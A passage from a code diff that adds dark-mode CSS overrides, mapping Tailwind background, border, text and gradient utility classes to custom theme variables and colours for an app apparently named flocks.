+.dark .bg-white\/40 {
+  background-color: var(--flocks-dark-surface);
+}
+
+.dark .disabled\:bg-white\/50:disabled {
+  background-color: rgb(48 56 66 / 0.55);
+}
+
+.dark .disabled\:bg-gray-50:disabled,
+.dark .disabled\:bg-zinc-50:disabled,
+.dark .disabled\:bg-slate-50:disabled {
+  background-color: rgb(48 56 66 / 0.62);
+}
+
+.dark .disabled\:bg-gray-200:disabled,
+.dark .disabled\:bg-zinc-200:disabled,
+.dark .disabled\:bg-slate-200:disabled,
+.dark .disabled\:bg-gray-300:disabled,
+.dark .disabled\:bg-zinc-300:disabled,
+.dark .disabled\:bg-slate-300:disabled {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .disabled\:hover\:bg-white:disabled:hover,
+.dark .disabled\:hover\:bg-gray-50:disabled:hover,
+.dark .disabled\:hover\:bg-zinc-50:disabled:hover,
+.dark .disabled\:hover\:bg-slate-50:disabled:hover {
+  background-color: var(--flocks-dark-surface);
+}
+
+.dark .disabled\:text-gray-400:disabled,
+.dark .disabled\:text-zinc-400:disabled,
+.dark .disabled\:text-slate-400:disabled,
+.dark .disabled\:text-gray-500:disabled,
+.dark .disabled\:text-zinc-500:disabled,
+.dark .disabled\:text-slate-500:disabled {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .disabled\:hover\:text-slate-600:disabled:hover,
+.dark .disabled\:hover\:text-gray-600:disabled:hover,
+.dark .disabled\:hover\:text-zinc-600:disabled:hover {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .disabled\:border-gray-200:disabled,
+.dark .disabled\:border-zinc-200:disabled,
+.dark .disabled\:border-slate-200:disabled {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .bg-gray-50,
+.dark .bg-zinc-50,
+.dark .bg-slate-50 {
+  background-color: var(--flocks-dark-app);
+}
+
+.dark .bg-gray-100,
+.dark .bg-zinc-100,
+.dark .bg-slate-100 {
+  background-color: var(--flocks-dark-surface-soft);
+}
+
+.dark .bg-gray-200,
+.dark .bg-zinc-200,
+.dark .bg-slate-200,
+.dark .bg-gray-300,
+.dark .bg-zinc-300 {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .bg-zinc-900,
+.dark .bg-gray-900,
+.dark .bg-slate-900,
+.dark .bg-zinc-950,
+.dark .bg-gray-950,
+.dark .bg-slate-950 {
+  background-color: var(--flocks-dark-surface) !important;
+}
+
+.dark button.bg-slate-700,
+.dark button.bg-slate-800,
+.dark button.bg-slate-900,
+.dark a.bg-slate-700,
+.dark a.bg-slate-800,
+.dark a.bg-slate-900,
+.dark .bg-slate-700.text-white,
+.dark .bg-slate-800.text-white,
+.dark .bg-slate-900.text-white,
+.dark .bg-gray-900.text-white,
+.dark .bg-zinc-800.text-white,
+.dark .bg-zinc-900.text-white {
+  background-color: var(--flocks-dark-surface-raised);
+  border-color: var(--flocks-dark-border-strong);
+  color: #ffffff;
+}
+
+.dark button.hover\:bg-slate-800:hover,
+.dark button.hover\:bg-slate-900:hover,
+.dark a.hover\:bg-slate-800:hover,
+.dark a.hover\:bg-slate-900:hover,
+.dark .hover\:bg-slate-800:hover,
+.dark .hover\:bg-slate-900:hover,
+.dark .hover\:bg-gray-900:hover,
+.dark .hover\:bg-zinc-900:hover {
+  background-color: #46515e;
+}
+
+.dark pre.bg-gray-900,
+.dark pre.bg-zinc-950,
+.dark code.bg-gray-900,
+.dark code.bg-zinc-950,
+.dark .font-mono.bg-gray-900,
+.dark .font-mono.bg-zinc-950,
+.dark .bg-gray-900.text-green-400,
+.dark .bg-zinc-950.text-green-400,
+.dark .bg-gray-900.text-gray-300,
+.dark .bg-zinc-950.text-zinc-300 {
+  background-color: #20262d;
+}
+
+.dark .bg-zinc-900\/70,
+.dark .bg-zinc-900\/80,
+.dark .bg-zinc-900\/95 {
+  background-color: rgb(48 56 66 / 0.96);
+}
+
+.dark .bg-zinc-950\/30,
+.dark .bg-zinc-950\/40,
+.dark .bg-zinc-950\/60 {
+  background-color: rgb(37 44 53 / 0.88);
+}
+
+.dark .dark\:bg-zinc-950,
+.dark .dark\:bg-gray-950,
+.dark .dark\:bg-slate-950 {
+  background-color: var(--flocks-dark-app) !important;
+}
+
+.dark .dark\:bg-zinc-950\/95,
+.dark .dark\:bg-gray-950\/95,
+.dark .dark\:bg-slate-950\/95 {
+  background-color: rgb(37 44 53 / 0.96) !important;
+}
+
+.dark .dark\:bg-zinc-900,
+.dark .dark\:bg-gray-900,
+.dark .dark\:bg-slate-900 {
+  background-color: var(--flocks-dark-surface) !important;
+}
+
+.dark .dark\:bg-zinc-900\/60,
+.dark .dark\:bg-zinc-900\/70,
+.dark .dark\:bg-zinc-900\/80,
+.dark .dark\:bg-zinc-900\/95 {
+  background-color: rgb(48 56 66 / 0.96) !important;
+}
+
+.dark .dark\:bg-zinc-800,
+.dark .dark\:bg-gray-800,
+.dark .dark\:bg-slate-800 {
+  background-color: var(--flocks-dark-surface-raised) !important;
+}
+
+.dark .dark\:bg-zinc-800\/50,
+.dark .dark\:bg-zinc-800\/60,
+.dark .dark\:bg-zinc-800\/70,
+.dark .dark\:bg-zinc-800\/80,
+.dark .dark\:bg-gray-800\/50,
+.dark .dark\:bg-gray-800\/60,
+.dark .dark\:bg-gray-800\/70,
+.dark .dark\:bg-gray-800\/80,
+.dark .dark\:bg-slate-800\/50,
+.dark .dark\:bg-slate-800\/60,
+.dark .dark\:bg-slate-800\/70,
+.dark .dark\:bg-slate-800\/80 {
+  background-color: rgb(70 81 94 / 0.72) !important;
+}
+
+.dark .dark\:hover\:bg-zinc-900:hover,
+.dark .dark\:hover\:bg-zinc-800:hover,
+.dark .dark\:hover\:bg-gray-900:hover,
+.dark .dark\:hover\:bg-gray-800:hover,
+.dark .dark\:focus\:bg-zinc-900:focus,
+.dark .dark\:focus\:bg-zinc-800:focus,
+.dark .dark\:focus-within\:bg-zinc-900:focus-within,
+.dark .dark\:focus-within\:bg-zinc-800:focus-within {
+  background-color: var(--flocks-dark-surface-raised) !important;
+}
+
+.dark .dark\:bg-sky-950\/30,
+.dark .dark\:bg-sky-950\/35,
+.dark .dark\:bg-sky-950\/45,
+.dark .dark\:bg-blue-950\/30,
+.dark .dark\:bg-blue-950\/40 {
+  background-color: rgb(83 155 245 / 0.16);
+}
+
+.dark .dark\:bg-amber-950\/25,
+.dark .dark\:bg-amber-950\/30,
+.dark .dark\:bg-amber-950\/40,
+.dark .dark\:bg-amber-950\/50,
+.dark .dark\:bg-orange-950\/30,
+.dark .dark\:bg-orange-950\/50,
+.dark .dark\:hover\:bg-amber-900\/60:hover {
+  background-color: rgb(217 119 6 / 0.16);
+}
+
+.dark .dark\:bg-red-950\/30,
+.dark .dark\:bg-red-950\/40,
+.dark .dark\:bg-rose-950\/30,
+.dark .dark\:bg-rose-950\/40,
+.dark .dark\:bg-rose-950\/50,
+.dark .dark\:hover\:bg-red-950\/40:hover {
+  background-color: rgb(220 38 38 / 0.14);
+}
+
+.dark .dark\:bg-green-950\/30,
+.dark .dark\:bg-green-950\/40,
+.dark .dark\:bg-teal-950\/30,
+.dark .dark\:bg-teal-950\/40,
+.dark .dark\:bg-cyan-950\/30,
+.dark .dark\:bg-cyan-950\/40 {
+  background-color: rgb(22 163 74 / 0.14);
+}
+
+.dark .dark\:bg-purple-950\/30,
+.dark .dark\:bg-purple-950\/40,
+.dark .dark\:bg-violet-950\/30,
+.dark .dark\:bg-violet-950\/40,
+.dark .dark\:bg-indigo-950\/30,
+.dark .dark\:bg-indigo-950\/40 {
+  background-color: rgb(124 58 237 / 0.16);
+}
+
+.dark .hover\:bg-white\/60:hover,
+.dark .hover\:bg-white\/70:hover,
+.dark .hover\:bg-white\/80:hover,
+.dark .hover\:bg-white:hover,
+.dark .hover\:bg-gray-50:hover,
+.dark .hover\:bg-zinc-50:hover,
+.dark .hover\:bg-gray-100:hover,
+.dark .hover\:bg-zinc-100:hover,
+.dark .hover\:bg-gray-200:hover,
+.dark .hover\:bg-gray-200\/60:hover,
+.dark .hover\:bg-zinc-200:hover,
+.dark .hover\:bg-zinc-200\/60:hover,
+.dark .hover\:bg-zinc-100\/70:hover,
+.dark .hover\:bg-slate-50:hover,
+.dark .hover\:bg-slate-100:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .focus\:bg-white:focus,
+.dark .focus\:bg-gray-200:focus,
+.dark .focus-within\:bg-white:focus-within {
+  background-color: var(--flocks-dark-surface);
+}
+
+.dark .bg-sky-50,
+.dark .bg-sky-50\/80,
+.dark .bg-sky-50\/60,
+.dark .bg-blue-50,
+.dark .bg-blue-50\/40,
+.dark .bg-blue-50\/60 {
+  background-color: rgb(83 155 245 / 0.16);
+}
+
+.dark .bg-amber-50,
+.dark .bg-amber-50\/30,
+.dark .bg-amber-50\/60,
+.dark .bg-amber-50\/70,
+.dark .bg-orange-50,
+.dark .bg-orange-50\/60,
+.dark .bg-yellow-50,
+.dark .bg-yellow-100,
+.dark .bg-yellow-200 {
+  background-color: rgb(217 119 6 / 0.16);
+}
+
+.dark .bg-red-50,
+.dark .bg-red-50\/30,
+.dark .bg-red-50\/40,
+.dark .bg-red-50\/50,
+.dark .bg-red-100\/80,
+.dark .bg-red-500\/10,
+.dark .bg-red-500\/15,
+.dark .bg-red-600\/5,
+.dark .bg-red-600\/10 {
+  background-color: rgb(220 38 38 / 0.14);
+}
+
+.dark .bg-green-50,
+.dark .bg-green-50\/50,
+.dark .bg-emerald-50,
+.dark .bg-emerald-50\/50,
+.dark .bg-emerald-500\/15,
+.dark .bg-emerald-100,
+.dark .bg-lime-50 {
+  background-color: rgb(22 163 74 / 0.16);
+}
+
+.dark .bg-gray-50\/60,
+.dark .bg-gray-50\/70,
+.dark .bg-gray-50\/80,
+.dark .bg-zinc-50\/60,
+.dark .bg-zinc-50\/70,
+.dark .bg-slate-50\/70 {
+  background-color: rgb(48 56 66 / 0.76);
+}
+
+.dark .bg-purple-50,
+.dark .bg-purple-50\/50,
+.dark .bg-purple-50\/60,
+.dark .bg-purple-100,
+.dark .bg-violet-50,
+.dark .bg-violet-100,
+.dark .bg-fuchsia-50,
+.dark .bg-indigo-50,
+.dark .bg-indigo-100 {
+  background-color: rgb(124 58 237 / 0.16);
+}
+
+.dark .bg-teal-50,
+.dark .bg-teal-100,
+.dark .bg-cyan-50,
+.dark .bg-cyan-100 {
+  background-color: rgb(20 184 166 / 0.14);
+}
+
+.dark .bg-pink-50,
+.dark .bg-pink-100,
+.dark .bg-rose-50,
+.dark .bg-rose-50\/80,
+.dark .bg-rose-100 {
+  background-color: rgb(244 63 94 / 0.14);
+}
+
+.dark .hover\:bg-sky-50:hover,
+.dark .hover\:bg-blue-50:hover,
+.dark .hover\:bg-blue-50\/30:hover,
+.dark .hover\:bg-blue-50\/40:hover,
+.dark .hover\:bg-sky-100:hover,
+.dark .hover\:bg-blue-100:hover,
+.dark .hover\:bg-amber-50:hover,
+.dark .hover\:bg-amber-50\/30:hover,
+.dark .hover\:bg-orange-50:hover,
+.dark .hover\:bg-yellow-50:hover,
+.dark .hover\:bg-amber-100:hover,
+.dark .hover\:bg-orange-100:hover,
+.dark .hover\:bg-red-50:hover,
+.dark .hover\:bg-red-100:hover,
+.dark .hover\:bg-red-400\/10:hover,
+.dark .hover\:bg-red-500\/20:hover,
+.dark .hover\:bg-red-500\/25:hover,
+.dark .hover\:bg-green-50:hover,
+.dark .hover\:bg-emerald-50:hover,
+.dark .hover\:bg-emerald-50\/80:hover,
+.dark .hover\:bg-emerald-500\/25:hover,
+.dark .hover\:bg-green-100:hover,
+.dark .hover\:bg-yellow-100:hover,
+.dark .hover\:bg-purple-50:hover,
+.dark .hover\:bg-violet-50:hover,
+.dark .hover\:bg-purple-100:hover,
+.dark .hover\:bg-violet-100:hover,
+.dark .hover\:bg-teal-50:hover,
+.dark .hover\:bg-cyan-50:hover,
+.dark .hover\:bg-teal-100:hover,
+.dark .hover\:bg-cyan-100:hover,
+.dark .hover\:bg-indigo-50:hover,
+.dark .hover\:bg-pink-50:hover,
+.dark .hover\:bg-rose-50:hover,
+.dark .hover\:bg-pink-100:hover,
+.dark .hover\:bg-rose-50\/70:hover,
+.dark .hover\:bg-rose-50\/80:hover,
+.dark .hover\:bg-rose-100:hover {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .group:hover .group-hover\:bg-sky-100,
+.dark .group:hover .group-hover\:bg-blue-50,
+.dark .group:hover .group-hover\:bg-blue-100,
+.dark .group:hover .group-hover\:bg-emerald-100,
+.dark .group:hover .group-hover\:bg-violet-100,
+.dark .group:hover .group-hover\:bg-zinc-100 {
+  background-color: var(--flocks-dark-surface-raised);
+}
+
+.dark .from-white,
+.dark .from-slate-50,
+.dark .from-gray-50,
+.dark .from-zinc-50 {
+  --tw-gradient-from: var(--flocks-dark-surface-soft) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(58 67 78 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-white,
+.dark .via-slate-50,
+.dark .via-gray-50,
+.dark .via-zinc-50 {
+  --tw-gradient-to: rgb(48 56 66 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--flocks-dark-surface) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-white,
+.dark .to-slate-50,
+.dark .to-gray-50,
+.dark .to-zinc-50 {
+  --tw-gradient-to: var(--flocks-dark-surface) var(--tw-gradient-to-position);
+}
+
+.dark .from-amber-50,
+.dark .from-orange-50 {
+  --tw-gradient-from: rgb(217 119 6 / 0.18) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(217 119 6 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-amber-50,
+.dark .via-orange-50 {
+  --tw-gradient-to: rgb(217 119 6 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(217 119 6 / 0.16) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-amber-50,
+.dark .to-orange-50,
+.dark .to-yellow-50 {
+  --tw-gradient-to: rgb(217 119 6 / 0.16) var(--tw-gradient-to-position);
+}
+
+.dark .from-emerald-50 {
+  --tw-gradient-from: rgb(22 163 74 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(22 163 74 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .via-teal-50 {
+  --tw-gradient-to: rgb(20 184 166 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(20 184 166 / 0.14) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-cyan-50 {
+  --tw-gradient-to: rgb(20 184 166 / 0.14) var(--tw-gradient-to-position);
+}
+
+.dark .via-rose-50 {
+  --tw-gradient-to: rgb(220 38 38 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), rgb(220 38 38 / 0.14) var(--tw-gradient-via-position), var(--tw-gradient-to);
+}
+
+.dark .to-rose-50 {
+  --tw-gradient-to: rgb(220 38 38 / 0.14) var(--tw-gradient-to-position);
+}
+
+.dark .from-purple-50 {
+  --tw-gradient-from: rgb(124 58 237 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(124 58 237 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .to-purple-50 {
+  --tw-gradient-to: rgb(124 58 237 / 0.16) var(--tw-gradient-to-position);
+}
+
+.dark .from-red-50,
+.dark .from-rose-50 {
+  --tw-gradient-from: rgb(220 38 38 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(220 38 38 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .from-purple-100 {
+  --tw-gradient-from: rgb(124 58 237 / 0.16) var(--tw-gradient-from-position);
+  --tw-gradient-to: rgb(124 58 237 / 0) var(--tw-gradient-to-position);
+  --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to);
+}
+
+.dark .to-purple-100 {
+  --tw-gradient-to: rgb(124 58 237 / 0.16) var(--tw-gradient-to-position);
+}
+
+.dark .to-red-50,
+.dark .to-red-100,
+.dark .to-rose-100 {
+  --tw-gradient-to: rgb(220 38 38 / 0.14) var(--tw-gradient-to-position);
+}
+
+.dark .border-gray-100,
+.dark .border-gray-50,
+.dark .border-zinc-100,
+.dark .border-slate-100,
+.dark .border-white,
+.dark .border-white\/80,
+.dark .border-white\/70,
+.dark .border-white\/60,
+.dark .border-gray-200,
+.dark .border-zinc-200,
+.dark .border-slate-200,
+.dark .border-gray-300,
+.dark .border-zinc-300,
+.dark .border-slate-300,
+.dark .border-gray-200\/80,
+.dark .border-zinc-200\/80,
+.dark .border-zinc-200\/90,
+.dark .border-zinc-200\/60,
+.dark .border-zinc-200\/70,
+.dark .border-l-gray-300,
+.dark .border-l-zinc-200,
+.dark .border-t-white,
+.dark .border-t-zinc-200,
+.dark .divide-gray-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-gray-50 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-zinc-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-gray-200 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-zinc-200 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-slate-100 > :not([hidden]) ~ :not([hidden]),
+.dark .divide-blue-100 > :not([hidden]) ~ :not([hidden]) {
+  border-color: var(--flocks-dark-border) !important;
+}
+
+.dark .border-gray-400,
+.dark .border-gray-500,
+.dark .border-gray-600,
+.dark .border-zinc-400,
+.dark .border-slate-400,
+.dark .border-slate-500,
+.dark .border-slate-600,
+.dark .focus\:border-gray-300:focus,
+.dark .focus\:border-zinc-300:focus,
+.dark .focus\:border-slate-400:focus,
+.dark .focus-within\:border-zinc-300:focus-within,
+.dark .hover\:border-gray-300:hover,
+.dark .hover\:border-gray-200:hover,
+.dark .hover\:border-zinc-300:hover,
+.dark .hover\:border-gray-400:hover,
+.dark .hover\:border-zinc-400:hover,
+.dark .hover\:border-slate-300:hover,
+.dark .hover\:border-slate-400:hover {
+  border-color: var(--flocks-dark-border-strong) !important;
+}
+
+.dark .dark\:border-zinc-950,
+.dark .dark\:border-zinc-900,
+.dark .dark\:border-zinc-800,
+.dark .dark\:border-gray-950,
+.dark .dark\:border-gray-900,
+.dark .dark\:border-gray-800,
+.dark .dark\:border-slate-950,
+.dark .dark\:border-slate-900,
+.dark .dark\:border-slate-800,
+.dark .dark\:divide-zinc-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-zinc-800 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-gray-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-gray-800 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-slate-900 > :not([hidden]) ~ :not([hidden]),
+.dark .dark\:divide-slate-800 > :not([hidden]) ~ :not([hidden]) {
+  border-color: var(--flocks-dark-border) !important;
+}
+
+.dark .dark\:border-zinc-700,
+.dark .dark\:border-zinc-600,
+.dark .dark\:border-gray-700,
+.dark .dark\:border-gray-600,
+.dark .dark\:border-slate-700,
+.dark .dark\:border-slate-600,
+.dark .dark\:hover\:border-zinc-700:hover,
+.dark .dark\:hover\:border-zinc-600:hover,
+.dark .dark\:hover\:border-gray-700:hover,
+.dark .dark\:hover\:border-gray-600:hover {
+  border-color: var(--flocks-dark-border-strong) !important;
+}
+
+.dark .hover\:border-blue-300:hover,
+.dark .hover\:border-blue-200:hover,
+.dark .hover\:border-blue-400:hover,
+.dark .hover\:border-purple-300:hover,
+.dark .hover\:border-purple-400:hover {
+  border-color: rgb(96 165 250 / 0.42);
+}
+
+.dark .hover\:border-sky-200:hover {
+  border-color: rgb(59 130 246 / 0.34);
+}
+
+.dark .hover\:border-amber-400:hover,
+.dark .hover\:border-amber-200:hover,
+.dark .hover\:border-orange-400:hover,
+.dark .hover\:border-yellow-400:hover {
+  border-color: rgb(245 158 11 / 0.42);
+}
+
+.dark .hover\:border-emerald-200:hover,
+.dark .hover\:border-emerald-300:hover,
+.dark .hover\:border-emerald-400:hover {
+  border-color: rgb(52 211 153 / 0.4);
+}
+
+.dark .hover\:border-red-200:hover,
+.dark .hover\:border-red-300:hover,
+.dark .hover\:border-rose-200:hover {
+  border-color: rgb(244 63 94 / 0.4);
+}
+
+.dark .hover\:border-violet-200:hover {
+  border-color: rgb(139 92 246 / 0.34);
+}
+
+.dark .border-sky-100,
+.dark .border-sky-200,
+.dark .border-sky-300,
+.dark .border-sky-400,
+.dark .border-sky-600,
+.dark .border-blue-100,
+.dark .border-blue-200,
+.dark .border-blue-300,
+.dark .border-cyan-400,
+.dark .focus\:border-blue-300:focus,
+.dark .focus\:border-blue-400:focus,
+.dark .focus\:border-blue-500:focus {
+  border-color: rgb(83 155 245 / 0.46);
+}
+
+.dark .border-amber-100,
+.dark .border-amber-200,
+.dark .border-amber-300,
+.dark .border-amber-400,
+.dark .border-yellow-200,
+.dark .border-yellow-500,
+.dark .border-orange-100,
+.dark .border-orange-200,
+.dark .border-orange-300,
+.dark .border-orange-400 {
+  border-color: rgb(245 158 11 / 0.34);
+}
+
+.dark .border-red-100,
+.dark .border-red-200,
+.dark .border-red-300,
+.dark .border-red-400\/40,
+.dark .border-red-600,
+.dark .border-l-red-400,
+.dark .border-l-red-500,
+.dark .border-t-red-600,
+.dark .focus\:border-red-400:focus,
+.dark .focus\:border-red-500:focus,
+.dark .focus-within\:border-red-500:focus-within,
+.dark .border-rose-100,
+.dark .border-rose-200,
+.dark .border-rose-300,
+.dark .border-pink-100,
+.dark .border-pink-200,
+.dark .border-pink-300,
+.dark .border-pink-400,
+.dark .border-pink-500 {
+  border-color: rgb(244 63 94 / 0.32);
+}
+
+.dark .border-green-100,
+.dark .border-green-200,
+.dark .border-green-300,
+.dark .border-green-400,
+.dark .border-green-500,
+.dark .border-l-green-400,
+.dark .border-l-green-500,
+.dark .border-emerald-100,
+.dark .border-emerald-200,
+.dark .border-emerald-300,
+.dark .border-emerald-400,
+.dark .border-lime-400,
+.dark .border-teal-100,
+.dark .border-teal-200,
+.dark .border-teal-300,
+.dark .border-teal-400,
+.dark .border-teal-500,
+.dark .border-cyan-100,
+.dark .border-cyan-200,
+.dark .border-cyan-300 {
+  border-color: rgb(34 197 94 / 0.3);
+}
+
+.dark .border-purple-100,
+.dark .border-purple-200,
+.dark .border-purple-300,
+.dark .border-purple-500,
+.dark .border-purple-600,
+.dark .focus\:border-purple-500:focus,
+.dark .border-violet-100,
+.dark .border-violet-200,
+.dark .border-violet-300,
+.dark .border-violet-400,
+.dark .border-violet-500,
+.dark .border-fuchsia-400,
+.dark .border-indigo-100,
+.dark .border-indigo-200,
+.dark .border-indigo-300,
+.dark .border-indigo-400 {
+  border-color: rgb(139 92 246 / 0.34);
+}
+
+.dark .dark\:border-zinc-900,
+.dark .dark\:border-zinc-800,
+.dark .dark\:border-gray-800,
+.dark .dark\:border-slate-800 {
+  border-color: var(--flocks-dark-border);
+}
+
+.dark .dark\:border-zinc-700,
+.dark .dark\:border-gray-700,
+.dark .dark\:border-slate-700,
+.dark .dark\:hover\:border-zinc-700:hover,
+.dark .dark\:focus\:border-zinc-700:focus,
+.dark .dark\:focus-within\:border-zinc-700:focus-within {
+  border-color: var(--flocks-dark-border-strong);
+}
+
+.dark .dark\:ring-zinc-800,
+.dark .dark\:focus\:ring-zinc-800:focus,
+.dark .dark\:focus-within\:ring-zinc-800:focus-within {
+  --tw-ring-color: rgb(90 101 115 / 0.72);
+}
+
+.dark .dark\:border-sky-500\/35,
+.dark .dark\:border-sky-500\/40,
+.dark .dark\:border-sky-500\/50,
+.dark .dark\:border-blue-500\/35,
+.dark .dark\:border-blue-500\/40,
+.dark .dark\:border-blue-500\/50 {
+  border-color: rgb(83 155 245 / 0.46);
+}
+
+.dark .dark\:border-amber-500\/30,
+.dark .dark\:border-amber-500\/35,
+.dark .dark\:border-amber-500\/40,
+.dark .dark\:border-orange-500\/35,
+.dark .dark\:border-orange-500\/40 {
+  border-color: rgb(245 158 11 / 0.34);
+}
+
+.dark .dark\:border-red-500\/30,
+.dark .dark\:border-red-500\/35,
+.dark .dark\:border-red-500\/40,
+.dark .dark\:border-rose-500\/30,
+.dark .dark\:border-rose-500\/35,
+.dark .dark\:border-rose-500\/40 {
+  border-color: rgb(244 63 94 / 0.32);
+}
+
+.dark .text-gray-950,
+.dark .text-zinc-950,
+.dark .text-slate-950,
+.dark .text-gray-900,
+.dark .text-zinc-900,
+.dark .text-slate-900,
+.dark .text-gray-800,
+.dark .text-zinc-800,
+.dark .text-slate-800 {
+  color: var(--flocks-dark-text);
+}
+
+.dark .text-gray-700,
+.dark .text-zinc-700,
+.dark .text-slate-700,
+.dark .text-gray-600,
+.dark .text-zinc-600,
+.dark .text-slate-600 {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .text-gray-500,
+.dark .text-zinc-500,
+.dark .text-slate-500,
+.dark .text-gray-400,
+.dark .text-zinc-400,
+.dark .text-slate-400,
+.dark .text-gray-300,
+.dark .text-zinc-300,
+.dark .text-slate-300 {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .hover\:text-gray-900:hover,
+.dark .hover\:text-zinc-900:hover,
+.dark .hover\:text-slate-900:hover,
+.dark .hover\:text-gray-800:hover,
+.dark .hover\:text-zinc-800:hover,
+.dark .hover\:text-slate-800:hover,
+.dark .hover\:text-gray-700:hover,
+.dark .hover\:text-zinc-700:hover,
+.dark .hover\:text-slate-700:hover,
+.dark .hover\:text-gray-600:hover,
+.dark .hover\:text-zinc-600:hover,
+.dark .hover\:text-slate-600:hover {
+  color: #ffffff;
+}
+
+.dark .text-sky-500,
+.dark .text-sky-600,
+.dark .text-sky-700,
+.dark .text-sky-800,
+.dark .text-blue-500,
+.dark .text-blue-600,
+.dark .text-blue-700,
+.dark .text-blue-800 {
+  color: #6cb6ff;
+}
+
+.dark .text-amber-500,
+.dark .text-amber-600,
+.dark .text-amber-700,
+.dark .text-amber-700\/80,
+.dark .text-amber-800,
+.dark .text-amber-950,
+.dark .text-yellow-500,
+.dark .text-yellow-600,
+.dark .text-yellow-700,
+.dark .text-yellow-800,
+.dark .text-orange-500,
+.dark .text-orange-600,
+.dark .text-orange-700,
+.dark .text-orange-800,
+.dark .text-orange-400 {
+  color: #fbbf24;
+}
+
+.dark .text-red-300,
+.dark .text-red-400,
+.dark .text-red-500,
+.dark .text-red-600,
+.dark .text-red-700,
+.dark .text-rose-400,
+.dark .text-rose-500,
+.dark .text-rose-600,
+.dark .text-rose-700,
+.dark .text-pink-500,
+.dark .text-pink-600,
+.dark .text-pink-700 {
+  color: #fda4af;
+}
+
+.dark .text-green-500,
+.dark .text-green-600,
+.dark .text-green-700,
+.dark .text-emerald-200,
+.dark .text-emerald-300,
+.dark .text-emerald-500,
+.dark .text-emerald-600,
+.dark .text-emerald-700,
+.dark .text-emerald-800,
+.dark .text-emerald-900,
+.dark .text-lime-700,
+.dark .text-teal-500,
+.dark .text-teal-600,
+.dark .text-teal-700,
+.dark .text-cyan-500,
+.dark .text-cyan-600,
+.dark .text-cyan-700 {
+  color: #86efac;
+}
+
+.dark .text-purple-500,
+.dark .text-purple-600,
+.dark .text-purple-700,
+.dark .text-purple-800,
+.dark .text-violet-500,
+.dark .text-violet-600,
+.dark .text-violet-700,
+.dark .text-violet-800,
+.dark .text-fuchsia-700,
+.dark .text-indigo-500,
+.dark .text-indigo-600,
+.dark .text-indigo-700 {
+  color: #c4b5fd;
+}
+
+.dark .bg-emerald-50.text-emerald-900,
+.dark .bg-emerald-50.text-emerald-950,
+.dark .bg-emerald-50 .text-emerald-900,
+.dark .bg-emerald-50 .text-emerald-950,
+.dark .from-emerald-50 .text-emerald-950 {
+  color: #d1fae5;
+}
+
+.dark .dark\:text-zinc-50,
+.dark .dark\:text-zinc-100,
+.dark .dark\:text-gray-50,
+.dark .dark\:text-gray-100,
+.dark .dark\:text-slate-50,
+.dark .dark\:text-slate-100 {
+  color: var(--flocks-dark-text);
+}
+
+.dark .dark\:text-zinc-200,
+.dark .dark\:text-zinc-300,
+.dark .dark\:text-gray-200,
+.dark .dark\:text-gray-300,
+.dark .dark\:text-slate-200,
+.dark .dark\:text-slate-300 {
+  color: var(--flocks-dark-text-muted);
+}
+
+.dark .dark\:text-zinc-400,
+.dark .dark\:text-zinc-500,
+.dark .dark\:text-zinc-600,
+.dark .dark\:text-gray-400,
+.dark .dark\:text-gray-500,
+.dark .dark\:text-gray-600,
+.dark .dark\:text-slate-400,
+.dark .dark\:text-slate-500,
+.dark .dark\:text-slate-600 {
+  color: var(--flocks-dark-text-subtle);
+}
+
+.dark .dark\:hover\:text-zinc-50:hover,
+.dark .dark\:hover\:text-zinc-100:hover,
+.dark .dark\:hover\:text-zinc-200:hover,
+.dark .dark\:hover\:text-gray-50:hover,
+.dark .dark\:hover\:text-gray-100:hover,
+.dark .dark\:hover\:text-gray-200:hover {
+  color: #ffffff;
+}
+
+.dark .hover\:text-sky-900:hover,
+.dark .hover\:text-blue-800:hover,
+.dark .hover\:text-blue-900:hover,
+.dark .hover\:text-amber-900:hover,
+.dark .hover\:text-orange-900:hover,
+.dark .hover\:text-red-600:hover,
+.dark .hover\:text-red-500:hover,
+.dark .hover\:text-red-700:hover,
+.dark .hover\:text-red-800:hover,
